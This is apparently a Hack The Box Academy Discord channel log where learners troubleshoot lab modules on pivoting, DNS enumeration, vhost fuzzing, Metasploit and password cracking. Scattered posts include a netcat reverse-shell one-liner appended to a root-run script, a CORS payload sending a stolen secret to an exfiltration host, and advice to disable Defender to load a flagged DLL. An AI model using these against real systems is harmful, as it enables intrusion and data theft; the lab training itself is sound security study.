#modules

Hi I am doing RDP and SOCKS Tunneling with SocksOverRDP section of "PIVOTING, TUNNELING, AND PORT FORWARDING" module. I downloaded the SocksOverRDP for AMD64 and transferred it to the Windows machine via RDP. I now need to load the SocksOverRDP.dll using regsvr32.exe. However, when I unzip the SocksOverRDP, I can see the .dll file. But after a while, it disappears automatically. Why is this happening?

I have tried it multiple times and this happens every time.

I get this error message when I try to load it because the file has been deleted for some reason:

real-time protection is running

So I should first disable it for this to work?

yep

real-time protecting SocksOverRDP-server.dll as a malicious dll

and is yeeting it

Made some progress by standing up smbserver, but still some kinks. Anyone have a good article for certutil for file downloads?

AD Trust Attacks: SID Filter Bypass CVE-2020-0665. When I modify ftinfo.py to parse msDS-TrustForestTrustInfo's data it doesn't show cihld.inlanefreight.ad as the module says it should. Am I doing something wrong?

I was still able to get the exploit working and obtain the flag and everything, but this doesn't reflect the information the module shows.

I managed to disable real time protection and load the dll file. However, when I RDP into the internal server, I get the following error:

I tried to ping the RDP server from the command prompt, but I don't get any response. That might have also been due to ICMP packet disable

A --> B --> C

there's a middle host you have to connect to

A is the first target; C is the target the question wants you to connect to

A doesn't share a network with C; but it does with B

B also shares a network with C

😉

and yes you do have all the info, this section is a guide

well.. not all the info.. real time protection lol

i just meant to move forward

not sure why they haven't added that RTP thing yet. i guess it's for a reason or they would have already.

i mean

windows basics ig

¯_(ツ)_/¯

but they disable other parts of the av heh

is that actually covered in some windows basics module?

¯_(ツ)_/¯

it could also be a slight show that defender isn't the only protection running on Windows machines

in arguably the most difficult part of the pivot module? heh

i don't recall anyone even asking for help on the skills assesment just this part

I got access to the intermediate server

I cannot find the realtime protection settings in the server

It's in the Windows Security settings

Virus & threat protection

I have checked there as well

what happens when you click open windows security

you turn off real-time protection for the device you are launching the .dll from

I need to repeat the same steps that I did for the first target server right?

https://support.microsoft.com/en-us/windows/stay-protected-with-windows-security-2ae0363d-0ada-c064-8b56-6a39afb6a963

nope

So, I am trying to load dll on the intermediate server as well

you don't need to load the dll on the second server

read the instructions again 😉 it only has you load the dll once; then has you set up the client exe

Search for Virus & threat protection settings

RTP is only running on the initial host

I have searched for it. Cannot find the settings

I don't understand, why do we even need to load the dll once again?

we don't

you only load the dll on the initial host

I mean could I not simply RDP into the the intermediate server without loading dll?

you run the exe on the second host

because the dll is used as a bridge from A --> B to be able to connect to C

You could do a lot of things to connect. This section is showcasing the SocksOverRDP method

^

i mean in all technicality you can connect to C from B

but that's not the point of the module

it's to teach you how to pivot through a network

the dll itself hooks into the remote desktop program

(which is why you get the success message and all that as shown by the module)

then on server 2 you run the exe which hooks back to the first host (finishing the bridge)

now for the fun part; Proxifier facilitates the connection

the instructions here; if you look

say socksoverrdpx64-server.exe not .dll

Yes I seemed to have missed that! Thanks

I will try again

I get this error

well

then you didn't load the dll on the first host

I did it

did you get the success message when you launched the mstsc.exe?

Yes

you mean SocksOverRDP dll right?

yes

Or the proxifier?

dll on host 1; exe on host 2

are you also running with admin privs

yeah admin prompt up there

well it seems like it either didn't load right or should be reloaded

and try again

It still gives the same error

launch the remote service after loading dll

Yes I reloaded the dll

And then tried executing the exe file

and I get the same error

yes but did you load the dll before or after you launched the remote desktop

When you remoted in as victor, did you get this?

^

The first time I got this message

you need this message

Now its using previous settings I guess

this section overall (at least with SocksOverRDP) is just a pain

I got the message:

It worked!

hi everyone

am stuck on Attacking Common Services "Attacking sql db's" section

flag value is not showing up

any help please

I have set up the proxifier

But when I connect to the internal target I get the error

Have you applied the settings from the performance consideration section?

I tried that too

nothing much

hello

how did you solved it?

Not much more you can do about connection quality. Maybe try changing vpn regions, or restarting the whole environment and trying again. make sure you apply the settings to all rdp sessions.

That command is not part of that module, and there is no section "attacking sql db's"

Try using the commands from the module

Hey, I am new here

How do I learn hacking

there is no cmds that lists the columns data so i searched it

HTB Academy is a great start

i write in short

I mean, what to do here ?

I am also getting this error in proxifier

The module gives you the commands to complete this. You need to enumerate the databases, then the tables, then select the information from the table.

you can crack the hash

am just stuck on flagDB. how i can read its content? i searched a lot

Re-read the "SQL Syntax" section

I have this on my notes:

Can I get some help ?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

thank you

thanks a lot i was working from last 4 hours.🥹 @cloud urchin

Did you get it?

yeah i got the flag

nice work

mate i have one question

the machine in final engagement of the shells & payloads modules is too slow. every click takes 3 seconds. is there any solution for this.

Hello folks, can i do a video writeup about the hackthebox modules?

I believe that if you can explain to someone something very well is the ultimate way of learning something

I remember i switched vpn from eu 1 to eu 2 and it worked way more smoother. But still not optimal.
Id say switch around some.regions and see whats best.
Other then that bite your teeth together and power through. Its not long live eng.

hey guys can anyone help me this "Connection has time out problem", its making me mad and am unable to solve challenges from modules.
What should I do?? Need urgent help !! I have to check ping status every 5 minutes to check whether its up or not

I believe HTB only allows Tier 0 modules’ content for publishing.

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

Reach out to support

I didnt find anything thats helping me on support, I seriously need help regarding this

Open a ticket with Support. Only the support team can help you in such a situation

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

It has been long time since you posted, yet did that hasher worked for you ? I get error flag when i post the answer!

Gm

Hi, Thank you i will try and will tell you 🙂

Where can i find someone to talk to about billings?

same, currently suffering with kerberos stuff, just stuck there for hours just bc machine is too slow and I can't help myself

annoys a lot

the task itself is not diffcult just a slow machine

I regret now taking this challenge, just thought would be great if I cover it, but I cannot skip those tasks since its not acceptable for me

too annoying buddy. i can feel.🥹

If it's questions about a subscription we might be able answer, if it's an issue with billing you will need to reach out to support. The green bubble on the lower right of the page.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

It was weird looked like i was billed twice on my banks app but it got fixed so idk all good i guess now

Anyone having issues on the pivoting and tunneling skills assesment RDP connection?

I've changed VPN servers and closest I get is the welcome screen and it sits

<@&861185840277487616>

can we only use pwn box only on web? is rdp also allowed to pwnbox?
bcz certain actions are not applied in pwn box then.
like when i press ctrl+w it close the pwn box tab rather the tab of browser i am using within pwnbox.

it is very difficult to use pwnbox in browser.

You can use your own vm

when am trying to get root flag using meterpreter; using this command echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.217 8083 > /tmp/f" >> monitor.sh
it says Text file busy , hungup
what should I do?

Which module, which section? Which question?

Penetration Tester -> Getting Started -> Nibbles Privileage Escalation -> root flag

If I remember correctly, the module is structured like a walkthrough. Follow the module exactly

doing same but not working

There is an alternate method of connecting to RDP other than username and password. any hint about it

https://medium.com/@JAlblas/hackthebox-nibbles-walkthrough-259ad8c014e9

i searched but nothing found

yep i did the same

but the problme is same

this is not the same 😉
Check the command

i also did the same thing just like this writeup but getting the same error again and again.

restart the lab an try again

okay let me try again

Is that a question? Yes there exist other methods then using pass/username

it is a hint

from the module of Attacking common services section attacking rdp

am stuck

tried lots of ways

is it priv esc?

Werent you asking about payload n shell a few hours ago?
Jumping and skipping other modules is bad

.

And for this module i havent done it yet since i havent worked on htb for more then a month now

i just asked about it i solved and i completed till now

all the modules

Hi, I tried this advice and none of the zones I found match the target IP. I also followed your advice and took a look at https://www.cloudflare.com/learning/dns/glossary/dns-zone/, but I'm still not understanding my mistake.

I'm looking for all of the SOA and PTR records because I think this is the right path.

can dm me

it's always better to use your own VM!

I treat pwnbox like this, when I can't do certain things bcz of my VPN issues I just spin up the pwnbox!

in the socksoverrdp section of pivoting, is the second server supposed to be pingable once proxifier is set up on the pivot host and socks is set up on the first server

you may DM if you have any tip, am opened to suggestions

or share it here I don't mind

this looks like you copy/pasted the reference code from the section

either way

yo why cant i write messages on general chat

either way; this could be considered spoilers

read and follow #welcome

module?

you don't need a long wordlist

i meant which module you goon lmao

You have an idea on how to solve that question 1? from Broken authentication (Predictable Reset Token)

that doesn't help

module name and section name are more helpful

the numbers don't mean shit

#modules message

that's not a module name

the NAME of the module

such as "Network Enumeration with NMAP"

that's the section name

there is no module named "Virtual Hosts"

thank you

long wordlist btw doesn't mean it would contain the same words as the right wordlist

it just means it has a lot of words

some just happened to get answers

i tried logging in with .\jason instead of just "jason" since the hint mentioned local accounts but i still cant connect to the second server

you don't need to login with it as local

the second server's user isn't jason

read the section carefully, it's a detailed list of steps, including the second host

is it victor

yes

this section is all about double hopping

the question tells you to get to server 3

the jump host is server 1

i meant server 3, sorry

you connect to 1 (A) --> run the dll
You then connect to B from A --> and then run the .exe
You then (on A) set up Proxifier
then (if everything is set up right) A --> C

all creds and hosts are provided in the section

did you figure this out yet

Yo,can someone help me?

ask your question and someone may help

no one can answer questions you don't ask

You're right. I've got a question on the footprinting module.

It's the last one about DNS where I'm expected to find the FQDN of the host where the last octet ends in 203. I believe I'm on the right track, but I'm sure I'm missing something.

hello how can i connect with smb (with the username bob)

https://tldp.org/HOWTO/SMB-HOWTO-8.html

@vast bolt ^^

thanks

are you using the showcased bruteforce tool?

hint: the tool isn't limited to the base domain

(there's other hints, but it's also covered by the hint button i belive)

the answer will be format {ans}.{subd}.inlanefreight.htb

I tried that at first, and the domains I found didn't match criteria, so I stepped away from that, and now I'm using the bash script that was shown in the module as well. It seems to be pulling the same results, so I know this is operator error.

Now I'm looking in the options and trying other lists, but it's all permutations of the info I already have.

So now I'm trying to see if there's something else I'm missing in my understanding, or if there's a place I can do a reverse lookup, but I'm 100% sure I'm supposed to bruteforce this.

the bruteforce tool is the way to go

it only looks as high as you tell it

Right, and I looked in this chat and someone suggested to use the small lists instead of the large ones, and I used those, but I still didn't see anything new.

if you only tell it to look at the base domain (inlanefreight.htb) it doesn't dig deeper

did you do a basic zone transfer (no tools)

Right, so I told it to look at the domains I found in the bruteforce.

to see what subdomains are potentially available?

first step: dig axfr inlanefreight.htb @ip

Yep. I (think?) I know all of them.

no bruteforce tools yet

Did that, and I have that info in my notes.

then one of those subdomains will have your answer

Then, I checked the SOA record because of this blog's advice: https://www.cloudflare.com/learning/dns/glossary/dns-zone/

SOA won't be helpful

Thanks, I'll try again within this scope.

PTRs?

nope

again

Ah... That was my mistake.

don't overthink

you're trying to overcomplicate

You're correct. Thank you.

that CF site was purely for people asking about what a DNS zone is

it's not telling you to look at SOA for anything

2 ways to move forward from this information

either manually check each subdomain with the tool

OR

create a list with the subdomains, and use a for loop

since it's a relatively small list

¯_(ツ)_/¯

hi

@fathom pendant I'm using the tool with a very large list and a for loop to make sure I don't miss anything. If that doesn't work, could I PM you and show you my methodology?

id_rsa file belongs to user dennis

but iwas able to login as root using the file

please explain my confusion

Perhaps use a more fierce list

Shadow ping pong

Not all wordlists are created equal

The ssh key is password protected

https://tenor.com/view/wow-gif-20411229

I tried that one so many times.

I'll do that one instead of the top million

Did he do chmod

On the id_rsa

Read the message

It's not about rsa perms

Oh...he is on that task.

He needs to crack that first to use it

Yup, he will have some fun.

¯_(ツ)_/¯

yes, i cracked passphrase using john,
what i dont understand is

id_rsa belongs to user dennis but how user root can login through that id_rsa

Logical leap

Why would he password protect it

d* might be the computer admin so the key is reused for both (not smart)

Wait...where is my beard role.

NOOOOO

Vanity roles don't stick around long

As goofy as they are

I trimmed my beard anyway

G0b knew and removed it then /s

I knew one of those links he sent in DMs was weaponized.

Bro installed a camera device on a monitor, somehow

Looking for some help in the virtual Hosts module of Information gathering - web edition

I'm stuck on finding out what the "HOST Header" is

I understand i'll need the vhost list while fuzzing to get the info I need, but Idk what my "HOST header" will be

-H "HOST: "

As likely shown in the section

so I just leave it blank afterwords

No

Since you're fuzzing for subdomains/vhosts

wil it be www.inlanefreight.htb

-H "HOST: FUZZ.inlanefreight.htb"

For ffuf

Or using a for loop -H "HOST: ${subdomain}.inlanefreight.htb"

ok i got it

I was putting www. infront and it didnt work for me at all

so I needed to get rid of the www

Yep the next fun part is properly filtering

After this is crawling

You'll notice a lot of results with the same length... but they all direct to the default login page if you curl them with the host header (same -H parameter)

Nah if you notice the pattern after a few seconds you can ctrl-c instead of waiting

Since it will hit 200 on everything in the list

Response size filtering is the next step

(Unless you already did that)

I didint do that yet

Alright so, what do you notice as the common size, filter that out

(-fs)

Ffuf has 2 types of filters
Filter out and match in
They use the same syntax except filters are -f(N) and matches are -m(N)

M for when you want the result, f for fuck it and throw it out

So then id wanna do a -m(N) to save some time?

Nope

(N) is replaced

Btw

But you don't know the size you want to match

But you do know what size you don't want

man ffuf or ffuf -h should give you syntax info

says 612

Curl one of those subdomains curl ip -H "HOST: subdomain.inlanefreight.htb"

And do that a few times to see

Or add a few to your /etc/hosts

first I need to get my list of subdomains. I didnt even do the vHost fuzzing to get the list of sub domains

Nope the basic namelist in the Seclists dns enumeration should have the subdomains

The point I'm trying to get you to see is. Is 612 the size you want?

If not, then filter it out

So then theres no point in me doing the vHost fuzzing

And ffuf won't give you those results

I'm telling you how to be more effective with it

You got it down to at least give you some info

But is the info it's given so far useful

If it's not, use the tool's options to get it to be more effective

After having a smol panic attack I understand now @fathom pendant

Lmao I read this like 10x and was so confused and then I it clicked after running || cat /opt/useful/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http://10.129.42.195 -H "HOST: ${vhost}.inlanefreight.com" | grep "Content-Length: ";done ||

So this result brought up a bunch of random bs and what I really needed was the subdomain list with the size of 612. But I don't know what the correlation is with 612. I do see it says its the default response size but is that all there is to it?

I got my results by running || ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.com" -fs 612 ||
this gave me the list I was looking for, thanks for the help!

sup everyone i need help on ADVANCED XSS AND CSRF EXPLOITATION-->CORS Misconfigurations
i have found the vuln page but when i set the origin to the exploit server nothing seem to happen here is my exploit
||` <script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://vulnerablesite.htb:53255/profile.php', true);
xhr.withCredentials = true;
xhr.onload = () => {
var doc = new DOMParser().parseFromString(xhr.response, 'text/html');

  var msg = encodeURIComponent(doc.getElementById('secret').innerHTML);
  location = 'https://exfiltrate.htb:53255/log?data=' + btoa(msg);
};
xhr.send();

</script>`||
im glad for any suggestions

Is there anyway for me to filter this down besides going and testinig everyone of these?

What's the common size

If you wanna spoiler the command, you put the || on the outside btw

I see the size of 10918 a lot

but I thought I filtered that out

sry didnt notice

With what ffuf parameter

-ms or -fs

-fs

|| ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.com" -fs 612 ||

is what I used

Well if the common size is this, why are you using ||612||

well actually all I see is 10918

-fs filter out responses of this size

Yes

Which means your filter is wrong lmao

-fs <size>

Or list,of,sizes

If you know 10918 isn't correct, by deduction, then you want ffuf to not show you those responses

Also

I noticed another issue

inlanefreight.com

I took out the || -fs612 || and got the same answer

It should be inlanefreight.htb

Brother

stop 😭

Idk how much more I can break this down

You got a common size of x

I see my ways of error 😦

So you do -fs x

Since those common sizes, are the default page

You know they dont have the info you are looking for

no no i got it now

please dont hate me now @fathom pendant

Your problem is mostly copy/pasting the given example command without actually thinking

Apply brain

I know think you have one

Delete

You goober

why i did the spoiler

Doesn't matter

People can easily click a spoiler message

Hello, I have a weird problem. When I connect to dante pro lab, I can’t access the lab network…
I get an answer from an external address when I ping into the lab network

And since that's directly part of the answer

Best to not post

To be fail, I did copy and past but I thought I changed everything I needed to... I just didnt think that hard on this is all....

Wrong channel brother

Which is the right one?

Read and follow #welcome to access #prolabs-dante

Otherwise reach out to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Apply brain

The way I did the questions I did I silly little for loop with the found subdomains and curl and grep

I'll do better master 😦

but i havnt come here for awhile so thats good 🙂

You havnt helped in a good chunk

¯_(ツ)_/¯

Step 1: read, step 2: realize you can't read, step 3: cry

Hello i'm doing the Pass The Ticket on linux section

I wanna know, when i do an "ls -la " on the /tmp directory there are tickets for julio

How do i know witch one hasn't expired? Both tickets have the same date

hi, is anyone else having connection issues with HTB?

my connection to targets seems very unreliable today 😦

the expiry of the ticket is embedded within the ticket itself, you won't see it running ls -la, import the ticket and run klist

Thanks

I'm taking a nap rip file transfer

I hope they fixed the US spawn giving an invalid date

It would default to 01/01/1970

I hope they fix the US servers in general

¯_(ツ)_/¯

I just bugged them about it for one module and it worked ™️

Took 8+ hours but yknow internals and stuff

I am currently doing password attack hard lab and i am unable to crack ||Logins.kdbx||
I have tried both, hashcat and john with mutulated password

Hi @fathom pendant, could I PM you? I think I'm messing up on something with this scan.

Well, did you use the appropriate 2john?

yes, ||keepass2john||

Your answer will be in the form of subdomain2.subdomain1.inlanefreight.htb

And you confirmed that the file isn't empty

If you didn't use python2.7 it can create an empty hash which is dumb

But it's doable with mutated list afaik or at least rockyou

Yeah guide says mutated as well so

@lunar brook I didn't say you could dm me, you can fuck off idc about your "project"

What do you think would be the best place to substitute the subdomain for the tool to bruteforce @weak shell

You don't have to change anything but that

You don't need to specify a different IP or anything like that

you mean , python2.7 to transfer file from victim windows to linux??

No

With keepass2john

It's that last bit that I'm changing based off of what I got from the dig enumeration

Here's my script:

||```
#zones is a file that I created from from the dig enumeration
for zone in $(cat zones.txt); do TOOL --dnsserver $IP --enum -p 0 -s 0 -o subdomains.txt -f WORDLIST $zone; done

@fathom pendant

What is your zones.txt

Also that's not how zones work fwiw

It'd be subdomains

Can I send that in plaintext, or is that against TOS?

Is zones.txt the subdomain.inlanefreight.htb

Yep

Ah

anyone done attacking web applications recently ?? Does the drupalgeddon3 work ? its throwing : [-] Exploit failed: NoMethodError undefined method `first' for nil:NilClass

It's missing something

if u writing a report and u find clear text creds in nfs and smb share would u put both of them together in the cvs scoring like Insecure file share or put them both indevidually like Insecure File Share NFS, Insecure File Share SMB

Gotcha

Delete though

Okay. I'll try harder.

Individual findings

Thanks for the sanity check. I apologize for bothering.

Dm me with just your dig results

WAIT

I THINK I KNOW WHAT I'M MISSING

It seems like you might be overcomplicating it

Step one dig
Step 2 use results to bruteforce

Somehow you got steps 1.a-1.z messing with your brain

any1 ?

Looks like you're loading it in msfconsole

Sometimes restarting the msfconsole fixes the Nil class error

solved it,

when i transfered file through ftp and generated the hash , it was not cracked

¯_(ツ)_/¯

but when i transfared file through smb and generated the hash it was cracked

why?
hash were diff

Could be many reasons

One being file corrupted in transit

¯_(ツ)_/¯

One small hiccup in your internet

i tried multiple time, did machine reset, rebooted my vm, and re transfered the file.
these things makes hard to solve the labs
wasted 1 full hour

ion radiation https://www.bbc.com/future/article/20221011-how-space-weather-causes-computer-errors

sometimes those cosmic sun rays just blast your computer

Always have multiple methods of file transferral

In case you suspect one is being dumb, do another

(Also xfreerdp has the /drive: option)

Which you can mount a directory as a fileshare

Btw that file is only step 1/5

ok

Lots of back and forth with this lab

You should learn and use the Get-FileHash command in Powershell to do checksums

Get-Help Get-FileHash -Online

Can't do -Online on target boxes

hi everyone

great wekend for everyone

you can try -Examples but it probably won't have the extra help stuff downloaded

tbh a quick Google usually sorts me out ¯_(ツ)_/¯

Trying to learn more PS over here 😛

Have you tried gestures vaguely the powershell docs

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/get-filehash?view=powershell-7.4

that's what that command sends you 😛

i have what it may seeem a dumb question, i connect to htb via a vpn, so when i have to ssh, i have to type ssh htb-student@10......(ip address), and after that, the pasword THB_@cadem...., my quiestion is, is there a way that i can automate this, and just enter the new ip since its always the same user and pwd, i am guessing it could be possible, but not sure it is, it is not an issue, and not superurgent, so, whoever have the time to answer this is perfect., thank you.

Nope

it's possible for sure

As the generated target IPs are dynamic

It would probably take longer to set it up than would actually be worth it

absolutely lol

It's also not always the same user/password

And sometimes it's on an alt port or public_ip:port

Or rdp

ooo

ok, thanks anyway

i'm sure you can make some python script to get the html page and read if it's ssh, rdp, grab the user/pass, then connect using it all

like MarcieLee said it'd be a lot of effort

but if it where the same ip address, like a home server, and the same user name and password, for it, would it be possible with some script or something like it?

it's possible with htb too, but yeah static variables would make it a lot easier to script

imagine an RDP shortcut, that's essentially what it does, just saves the login info/hostname and connects to it without you inputting stuff

ok, i'll look into it, thank you again, have a great day

The ips are hardly ever static

They are spun up and given an ip from an available range

Occasionally the stars align and you get the same ip as the examples

You can spin the same target up 3 separate times and get 3 different IPs

oh, i have a home server for testing, and i am thinking on installing linux on it, so i can use it as a hack box

That's not how this works

The target ips aren't static

Unless you mean setting up your own scenarios

In which case, sure you can automate it

thats it

But that goes beyond the scope of academy

Also the term you'd be looking for may be "home lab"

yeah i mean, i am setting up a lab, in my home, and

Not your own "hack the box"

And if you want advice on homelab setups there's a whole ass channel for it

yup, my mistake, thats what i meant

#homelab-sysadm

OOOO

looking into that, thanks again

For the people who did pentest path, are there any modules similar to Password Attacks module?....i hope not

I mean

Password attacks opens up a broad technique set

That you'll use throughout

¯_(ツ)_/¯

It's skills you'll get used to

Its the time i have to take on some labs that i dont like, i understand it is brute force but i think it should be a bit shorter

Everyone works through the modules at different speeds. What is slow for you others may get quickly and vice versa.

And the overall question wording is a bit confusing if not misleading tbh

Sure thing

Just gotta think outside the box

Or at least understand that you're generally given an end goal, not a starting point

just finished IPMI footprinting that mask is useless

The mask is for specific circumstances if you actually read

yeah i getcha however i had gotten used to the format of the provided commands being relevant for the questions

my poor gen-z brainrotted brain has to actually think outside the box

whatever am i going to do

You have a brain? /s

are there ever opportunities to suggest or offer changes or updates to the content?

#1234357888114364508 if it's a clarification change or /feedback

Or if you're really feeling it messaging support

@fathom pendant

in footprinting linux remote management protocol it says:
Allowing password authentication allows us to brute-force a known username for possible passwords. Many different methods can be used to guess the passwords of users. For this purpose, specific patterns are usually used to mutate the most commonly used passwords and, frighteningly, correct them

what does it mean by correct them sorry?

Password list weak, mutated password list strong, rules are applied to a generic list to make permutations like p455w0rD!

ah right duh

thanks!

As Unga as I can break it down

If you try and mutate rockyou I hear your hard drive kills itself

i will try later

unga boonga

Try using the full path like shown in the sudo -l output, including /user/bin/python3

Threw me for a loop before too

why cant i talk in off topic

Read #welcome and follow the instructions

alr thanks

I'm getting a consistent timeout across VPN endpoints in the AD enum and attacks module's "Attacking Domain Trusts - Child -> Parent Trusts - from Linux". Neither the manual method nor raiseChild.py is working for me. I've followed the steps meticulously but I must be missing something. Was wondering if anyone else had run into this issue in the past. Thanks!

I was able to complete it

You may want to reconnect to the vpn, or re-download the vpn to regenerate it, or change regions and try again.

Done both of those unfortunately

Is this a high-traffic time or smth?

Just timeout at every turn

are you trying from the internal box or your own

My own

I haven't got an attackbox spun up

I can give that a try

It'd only be the fourth time I've learned that lesson...

not the attack box

the internal box, the pivot host

how are you pivoting into the network?

From my VM -> Linux attack host -> child DC

As prescribed.

that tells me nothing, exactly how are you doing that

ssh dynamic port forwarding, chisel, ligolo

Nothing

well there's your problem

Nichevo

How you mean

Are we talking about the same module

your vm won't be able to connect to the private vlan without setting up a pivot of some kind

Listne

My VM

to the Linux attack host

I think the target box on the inside is a linux box

No

Okay, I am stuck on the Shells & Payload Live Enagement Host 2. I tried resetting msf and the options for the ||50064.rb|| exploit.

Here are my options:

||msf6 exploit(50064) > options

Module options (exploit/50064):

Name Current Setting Required Description

PASSWORD admin123!@# yes Blog password
Proxies no A proxy chain of format type:hos
t:port[,type:host:port][...]
RHOSTS 172.16.1.12 yes The target host(s), range CIDR i
dentifier, or hosts file with sy
ntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing c
onnections
TARGETURI / yes The URI of the arkei gate
USERNAME admin yes Blog username
VHOST blog.inlanefreight.l no HTTP server virtual host
ocal

Payload options (php/meterpreter/bind_tcp):

Name Current Setting Required Description

LPORT 4444 yes The listen port
RHOST 172.16.1.12 no The target address

Exploit target:

Id Name

0 PHP payload||

Here is the output after I run the exploit:

||msf6 exploit(50064) > run

[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass
[*] Exploit completed, but no session was created.||

What am I missing?

Christ that's long

Target is an AD DC

Restart msfconsole and try again

Where are you executing the tools from, your VM or the pivot host?

The linux attack host

which is...

All my VM is running is SSH

I'm using target loosely as the 10.129.x.x box

Nothing local

My bad. The target is the linux attack host provided

are you able to ping the DC from the attack host?

I'm not able to ping either of them

Your copy/paste is missing info did you set the vhost as the fqdn blog.inlanefreight.local

But that may be LOOSELY related to the fact that Windows is pre-configured to ignore them

Also helps to wrap text like that in backticks so it's formatted better and easier to read
``` before and after

Generally when you're in the network environment they'll respond to pings

Or they should

Yeah, my bad. I restarted it and still getting the error. My VHOST option is set to "blog.inlanefreight.local"

Strange you can't ping your attack host but can ssh into it

🤦‍♂️

What are all the regions you tried?

Not what I said

US 1,2,3

it is what you said

He's saying he can't ping the DC from the provided host

try a totally different region like EU

^

US vpn has been shifty with this module

He said he can't ping the DC or the attack host

Either of the DCs.

Child or parent

Sorry

I get you now.

Are you pinging FQDN or the actual IP

I'd start by trying EU region, sounds like something may be borked

^ this is most likely btw

Switching now to give it a shot

I'm bouncing around the HTB infra like a pinball

https://tenor.com/view/stern-pinball-stern-pinball-iron-maiden-bumpers-gif-12658830

https://tenor.com/view/tilt-gif-9778843

Also was getting ticked bc thought my enter key was going before realizing slowmode was on. 😂

Did not want to replace that.

Danke for the patience gents.

Yeah slow mode is on in the academy channels because spammers

i'm slow so i need it

CRIKEY

Twas instant

All fixed. 🤦‍♂️

https://tenor.com/view/noice-nice-click-gif-8843762

Sorry to waste y'all's time.

not a waste

🙏

Is ||VHOST blog.inlanefreight.local|| the correct syntax for the VHOST option in Shells & Payloads Live Engagement for Host 2 exploitation (||50064.rb|| exploit)?

Yes

Try resetting the target and restarting your attack box as a whole

Same error 😦
||[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass||

Weird

Try changing vpn regions to EU and running it again

I hate that this is what I was missing for the past few hours... Thanks for the help

Yeah

It seems like a lot of modules are having issues spawning internal networks and such on the US servers

Definitely will remember that for future modules

Done enough sanity checking the last few weeks lmao

For whatever reason the internal networks/boxes either don't spawn or don't work properly

The password attacks module was having issues with one section giving a 01/01/1970 ccache

Which is just a tiny bit expired

Stupid question, let's say I went through a module , but want to go through it again even if I dont score any extra cubes, can I reset progress or so I have to just remember where I am at?

when you launch the target machine it spawns a fresh instance for that module, it does not save anything done previously

You can retake the module too

No worries, thanks for answering, just want to bruch up on AD before I attempt the CPTS

It won't clear your prior answers

ahh. what's it do then lol

Puts you in at the beginning of the module

thanks for the clarification

I'm sure if you bribed support hard enough you could

it would probably mess with the "completed" flag and maybe lose access if you don't have a subscription

I am stuck in INFORMATION GATHERING - WEB EDITION module and in question What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer. . i ran this but won't get anything related to ip 10.10.1.5

what section

this sec ==> What FQDN is assigned to the IP address 10.10.1.5

Active Subdomain Enumeration

Yes that's the question

But it's likely related to the overall spawned target

I.e. doing a zone transfer or two should yield you answers

nslookup -type=any -query=AXFR inlanefreight.htb $ip

but not get anything related to that 10.10.1.5 ip

Im blocked in the module Linux fundamental

what is blocking you lol

"i'm blocked" doesn't necessarily help us help you

I'll send a screen

tips for getting effective help:
Module name:
Section Name:
question:
What is causing you trouble

oh

you need to be ssh into the target

i see you have some answers

Yes

but i also suggest using the command that may show the environment variables

But I did "ip address" and for the mtu idk his name

?

name is just what the interface is called

that is going to be incorrect

all of these ?

you need to be running the ip a command in the ssh session

all of the commands to find information need to be done in the ssh session

okay but how I do SSH

the instructions on how to ssh are on the academy page

Yeah I read it

but Idk what ip is

did you click the button "Click here to spawn the target system!"

the spawn instance button is for the in-browser virtual machine aka pwnbox it is not the target

it's not gonna be 127.0.0.1

so how I can found ip adress

click that green text

it should give you an ip

ohhh

i suggest doing the "Introduction to academy" module

as interacting with academy is taught in that module

wrong channel

read and follow #welcome and ask in #sherlocks

Ok I successfully ssh

And I found the Mtu question

But what is "shell"

What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer. information gathering webaddition, active subdomain enum.

i'm stuck in this question

environment variables are useful

cat /etc/shells

that's not generally helpful

where can I found that?

there's a list of commands given at the top

i suggest reading what each of those do

just type env and hit enter

oh yes but I looked but I don't find anyway

any help for mine ?

you should

specifically the variable that might relate to the SHELL

i feel like i nudged you earlier

what have you tried; full syntax of command

can you give the command

no

i don't outright give commands

scroll even further up

then any reffence

well this module teaches you about dig yeah?

or nslookup?

what have you tried

here?

if you tell me what you've tried i can likely tell you where you're going wrong

wait i'm sending right now

yep

one of those commands relates to environment

i suggest reading and taking notes

you're not gonna remember all the things you learn right away

the more you do the more you'll learn

nslookup -type=any -query=AXFR inlanefreight.htb $ip

But I dont even know what is a shell 😢

i'm guiding you to find the answer

one step at a time

bro

you got the answer for the .136 question yeah?

and the .txt question?

look at that subdomain that you found those answers

yes I do ... but not this one using the same way

brother

the .5 is in the same place as the .136

I found it

But I don't understand why

congrats

well

yes

that is the SHELL environment variable

meaning that's the shell that is used when a terminal session is started

bash is the bourne again shell

it's yeeting your output because it's a large block of text

but i'm telling you, it's in the subdomain you found the TXT record in

wait brother, again I'm trying the last one

I did it

i also suggest finishing modules before you start a new one

Thank you so much brother, I found

the Learning process module wasn't meant for you to stop in the middle of it and start on Linux Fundamentals

it's true

hi can you give me a hint about the section of rdp attacking in module of attacking common services.

there is already hint:There is an alternate method of connecting to RDP other than username and password. but am not able to find method i tried registry settings but nothing

anyone else

it begins with evil

oh wait

no i tried

READ the fuckin section

it tells you how to pass the hash

Try reading the RDP Pass-the-Hash (PtH) section

trying from 2 days

pth not working

well trying != reading

instead of using a password you can use something else

wdym "not working"

not working isn't an error

hold on

and without providing us your command syntax it doesn't help

copy/paste your command here, don't screenshot

i rdp to the machine and found a file

Besides remoting into the machine with a hash, what else is covered in that section I mentioned?

Look at question 2, then question 3

am not geting it

